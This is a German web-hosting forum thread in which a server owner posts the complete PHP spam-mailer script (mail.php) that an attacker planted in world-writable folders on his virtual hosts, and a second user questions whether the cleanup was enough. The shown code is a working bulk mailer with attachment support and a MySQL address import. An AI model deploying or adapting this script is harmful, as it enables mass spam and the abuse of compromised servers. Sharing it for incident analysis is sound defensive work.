Nach Hackerangriff und Spamzombie Script gefunden

[thefreeman]

Hallo.

Habe heute herausgefunden, was für ein Script der Hacker abgelegt hat.
Unter meinen Vhosts war in verschiedenen Ordnern mit 777-Rechten folgendes PHP-File abgelegt (mail.php):

Code: Select all

<?

If ($action=="mysql"){
	#Grab email addresses from MySQL
	include "./mysql.info.php";
	if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){
	print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required.";
	exit;
	}
	$db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed.");
	mysql_select_db($sqldb, $db) or die("Could not select database $sqldb");
	$result = mysql_query($sqlquery) or die("Query Failed: $sqlquery");
	$numrows = mysql_num_rows($result);
	
	for($x=0; $x<$numrows; $x++){
	$result_row = mysql_fetch_row($result);
	$oneemail = $result_row[0];
	$emaillist .= $oneemail."n";
	}
	}

if ($action=="send"){
	$message = urlencode($message);
	$message = ereg_replace("%5C%22", "%22", $message);
	$message = urldecode($message);
	$message = stripslashes($message);
	$subject = stripslashes($subject);
}

?>
<form name="form1" method="post" action="" enctype="multipart/form-data">
  <br>
  <table width="100%" border="0">
    <tr> 
      <td width="10%"> 
        <div align="right"><font size="-1" face="Tahoma">Your 
          Email:</font></div>
      </td>
      <td width="18%"><font size="-1" face="Tahoma"> 
        <input type="text" name="from" value="<? print $from; ?>" size="30">
        </font></td>
      <td width="31%"> 
        <div align="right"><font size="-1" face="Tahoma">Your 
          Name:</font></div>
      </td>
      <td width="41%"><font size="-1" face="Tahoma"> 
        <input type="text" name="realname" value="<? print $realname; ?>" size="30">
        </font></td>
    </tr>
    <tr> 
      <td width="10%"> 
        <div align="right"><font size="-1" face="Tahoma">Reply-To:</font></div>
      </td>
      <td width="18%"><font size="-1" face="Tahoma"> 
        <input type="text" name="replyto" value="<? print $replyto; ?>" size="30">
        </font></td>
      <td width="31%"> 
        <div align="right"><font size="-1" face="Tahoma">Attach 
          File:</font></div>
      </td>
      <td width="41%"><font size="-1" face="Tahoma"> 
        <input type="file" name="file" size="30">
        </font></td>
    </tr>
    <tr> 
      <td width="10%"> 
        <div align="right"><font size="-1" face="Tahoma">Subject:</font></div>
      </td>
      <td colspan="3"><font size="-1" face="Tahoma"> 
        <input type="text" name="subject" value="<? print $subject; ?>" size="90">
        </font></td>
    </tr>
    <tr valign="top"> 
      <td colspan="3"><font size="-1" face="Tahoma"> 
        <textarea name="message" cols="60" rows="10"><? print $message; ?></textarea>
        <br>
        <input type="radio" name="contenttype" value="plain" checked>
        Plain 
        <input type="radio" name="contenttype" value="html">
        HTML 
        <input type="hidden" name="action" value="send">
        <input type="submit" value="Send Message">
        </font></td>
      <td width="41%"><font size="-1" face="Tahoma"> 
        <textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea>
        <br>
        
    </tr>
  </table>
</form>

<?
if ($action=="send"){

	if (!$from && !$subject && !$message && !$emaillist){
	print "Please complete all fields before sending your message.";
	exit;
	}
	
	$allemails = split("n", $emaillist);
	$numemails = count($allemails);

	#Open the file attachment if any, and base64_encode it for email transport
	If ($file_name){
		@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server");
		$content = fread(fopen($file,"r"),filesize($file));
		$content = chunk_split(base64_encode($content));
		$uid = strtoupper(md5(uniqid(time())));
		$name = basename($file);
	}
	
	for($x=0; $x<$numemails; $x++){
		$to = $allemails[$x];
		if ($to){
		$to = ereg_replace(" ", "", $to);
		$message = ereg_replace("&email&", $to, $message);
		$subject = ereg_replace("&email&", $to, $subject);
		print "Sending mail to $to.......";
		flush();
		$header = "From: $realname <$from>rnReply-To: $replytorn";
		$header .= "MIME-Version: 1.0rn";
		If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uidrn";
		If ($file_name) $header .= "--$uidrn";
		$header .= "Content-Type: text/$contenttypern";
		$header .= "Content-Transfer-Encoding: 8bitrnrn";
		$header .= "$messagern";
		If ($file_name) $header .= "--$uidrn";
		If ($file_name) $header .= "Content-Type: $file_type; name="$file_name"rn";
		If ($file_name) $header .= "Content-Transfer-Encoding: base64rn";
		If ($file_name) $header .= "Content-Disposition: attachment; filename="$file_name"rnrn";
		If ($file_name) $header .= "$contentrn";
		If ($file_name) $header .= "--$uid--";
		mail($to, $subject, "", $header);
		flush();
		}
		}

}

?>

Das Script habe ich entfernt und meine Sicherheitslücken gestopft.
Jetzt ist wieder schluss mit dem Drecksspam.

[rootsvr]

Und wofür dein Post?

- Du wolltest mitteilen, das Du ein Spambot warst?
--> Super.. Toll.. Bravo!

- Du wolltest uns ein Spamsscript zeigen?
--> Gibt es überall wie Sand am Meer?

- Du willst damit angeben die (ungenannten) Sicherheitslücken gestopft zu haben?
--> Bist Du sicher? Woher weißt Du, dass der Angreifer nur dieses Script eingespielt hat?

- Dir ist langweilig?
--> Mir auch!

edit: Typo gefixt